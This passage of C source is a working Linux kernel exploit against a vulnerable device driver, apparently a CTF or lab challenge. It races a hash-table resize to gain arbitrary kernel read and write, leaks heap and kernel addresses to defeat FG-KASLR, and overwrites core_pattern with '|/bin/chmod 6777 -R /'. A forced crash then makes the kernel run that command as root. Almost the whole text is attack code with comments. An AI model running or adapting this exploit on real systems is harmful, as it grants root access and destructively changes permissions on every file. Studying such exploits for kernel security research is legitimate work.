pthread_join(th, NULL);
}
puts("[*] Checking there is a corrupted entry...");
uint64_t entry_key = -1, backing_key = -1;
for (int i = 0; i <= cur_threshold + 1; ++i) {
uint32_t cur_key = collision_keys[i];
vuln_dev_get_value(collision_keys[i], data, 0x20);
/* Skip untouched values ('aaaa...') and anything whose high dword is
 * not the sprayed entry size 0x20. */
if (*uint64_data == 0x6161616161616161 || (*uint64_data >> 32) != 0x20) {
continue;
}
entry_key = cur_key;
backing_key = (*uint64_data) & 0xffffffff;
break;
}
close(uffd);
munmap(uffd_page, 0x1000);
return (entry_key << 32) | backing_key;
}
uint32_t controller_key, backing_key;
uint64_t original_backing_ptr;
/* Read the controller entry's 0x20-byte view of the overlapped hash_entry
 * and return its second qword -- the backing entry's `value` pointer,
 * i.e. a kernel heap address. */
static uint64_t leak_heap_address() {
  uint64_t words[4];
  vuln_dev_get_value(controller_key, words, 0x20);
  return words[1];
}
/* Arbitrary read: rewrite the overlapped hash_entry through the controller
 * key (word 0 = size<<32 | key, word 1 = value pointer -> addr), then read
 * `size` bytes out through the backing key. */
static void aar(void* dest, uint64_t addr, size_t size) {
  uint64_t fake[2];
  fake[0] = ((uint64_t)(size & 0xffffffff) << 32) | backing_key;
  fake[1] = addr;
  vuln_dev_update_value(controller_key, fake, 0x10);
  vuln_dev_get_value(backing_key, dest, size);
}
/* Arbitrary write: point the overlapped hash_entry's value at `addr` with
 * length `size` via the controller key, then update through the backing
 * key so the kernel copy_from_user()s `src` into addr. */
static void aaw(uint64_t addr, void* src, size_t size) {
  uint64_t fake[2];
  fake[0] = ((uint64_t)(size & 0xffffffff) << 32) | backing_key;
  fake[1] = addr;
  vuln_dev_update_value(controller_key, fake, 0x10);
  vuln_dev_update_value(backing_key, src, size);
}
/* Convenience: arbitrary read of a single 64-bit word at `addr`. */
static uint64_t aar64(uint64_t addr) {
  uint64_t value = (uint64_t)-1;
  aar(&value, addr, sizeof(value));
  return value;
}
static void aaw64(uint64_t addr, uint64_t val) { return aaw(addr, &val, 8); }
/*
 * Scan the kernel heap around `heap_addr` (+/- 0x8000, qword-aligned) for
 * a value that falls in the kernel-text address range, returning it or
 * (uint64_t)-1 if none is found. The /proc/self/stat sprays presumably
 * populate nearby heap slots with objects containing kernel-text pointers
 * -- TODO confirm which object is actually being relied on.
 *
 * Fix: dropped the unused `data`/`uint64_data` locals from the original.
 */
static uint64_t find_kernel_address(uint64_t heap_addr) {
  int sprays[0x1000];
  for (int i = 0; i < 0x1000; ++i) {
    sprays[i] = open("/proc/self/stat", O_RDONLY);
  }
  uint64_t addr = heap_addr - 0x8000;
  uint64_t ret = -1;
  while (addr <= heap_addr + 0x8000) {
    uint64_t val = aar64(addr);
    if (IS_IN_KERNEL_BASE_RANGE(val)) {
      ret = val;
      break;
    }
    addr += 8;
  }
  for (int i = 0; i < 0x1000; ++i) {
    close(sprays[i]);
  }
  return ret;
}
/*
 * Probe the module mapping area page by page until a readable (mapped)
 * page is found, returning its address; (uint64_t)-1 if the whole window
 * is unmapped.
 *
 * Fix: the original fell off the end of a non-void function (undefined
 * behavior) when the scan exhausted the window without a hit.
 */
static uint64_t find_module_base() {
  uint64_t addr = KERNEL_MODULE_START;
  while (addr <= KERNEL_MODULE_START + 0x10000 * 0x1000) {
    uint64_t val = aar64(addr);
    if (val != (uint64_t)-1) {
      return addr;
    }
    addr += 0x1000;
  }
  return (uint64_t)-1;
}
/* Starting from a megabyte-aligned guess derived from a leaked kernel-text
 * address, step downward in 0x100000 strides reading the would-be
 * core_pattern slot until it contains the default string "core".
 * Returns the matching address (loops indefinitely if never found). */
static uint64_t find_core_pattern_address(uint64_t kernel_addr) {
  char probe[0x20];
  const uint64_t base_guess = kernel_addr & ~0xfffffULL;
  uint64_t candidate = base_guess + KERNEL_CORE_PATTERN_OFFSET;
  for (;;) {
    aar(probe, candidate, sizeof(probe));
    if (strcmp(probe, "core") == 0) {
      return candidate;
    }
    candidate -= 0x100000;
  }
}
/*
 * Exploit driver: build the overlapping-entry primitive, derive AAR/AAW,
 * locate core_pattern, overwrite it with a usermode-helper pipe command,
 * then crash this process so the kernel invokes it.
 */
int main() {
vuln_fd = open("/dev/" VULN_DEV_NAME, O_RDONLY);
if (vuln_fd < 0) {
fatal("open(/dev/" VULN_DEV_NAME ")");
}
/* Race the resize to get a key whose value overlaps another key's entry. */
uint64_t entry_key_and_backing_key = construct_corrupted_entry();
controller_key = entry_key_and_backing_key >> 32;
backing_key = entry_key_and_backing_key & 0xffffffff;
original_backing_ptr = leak_heap_address();
printf(
"[+] Find corrupted entry! (controller_key=0x%08x, "
"backing_key=0x%08x; backing_ptr=0x%016lx)\n",
controller_key, backing_key, original_backing_ptr);
/* Leak a kernel-text pointer from the heap, then walk down to the
 * "core" string to pin down core_pattern (FG-KASLR defeats simple
 * text-offset math, hence the search). */
uint64_t kernel_address = find_kernel_address(original_backing_ptr);
printf("[+] kernel_address(not base): 0x%016lx\n", kernel_address);
uint64_t module_base = find_module_base();
printf("[+] module_base: 0x%016lx\n", module_base);
uint64_t core_pattern_address = find_core_pattern_address(kernel_address);
printf("[+] core_pattern_address: 0x%016lx\n", core_pattern_address);
uint64_t kernel_base = core_pattern_address - KERNEL_CORE_PATTERN_OFFSET;
printf("[+] kernel_base: 0x%016lx\n", kernel_base);
/* The leading '|' makes the kernel run this as root on any core dump. */
char new_core_pattern[] = "|/bin/chmod 6777 -R /";
printf("[*] Overwrite core_pattern to \"%s\"...\n", new_core_pattern);
aaw(core_pattern_address, new_core_pattern, sizeof(new_core_pattern));
puts("[*] Trigger core_pattern...");
/* Deliberate wild write -> SIGSEGV -> core dump -> helper runs as root. */
uint64_t* evil = (uint64_t*)0xdeadbeefcafebebe;
*evil = 0;
return 0;
}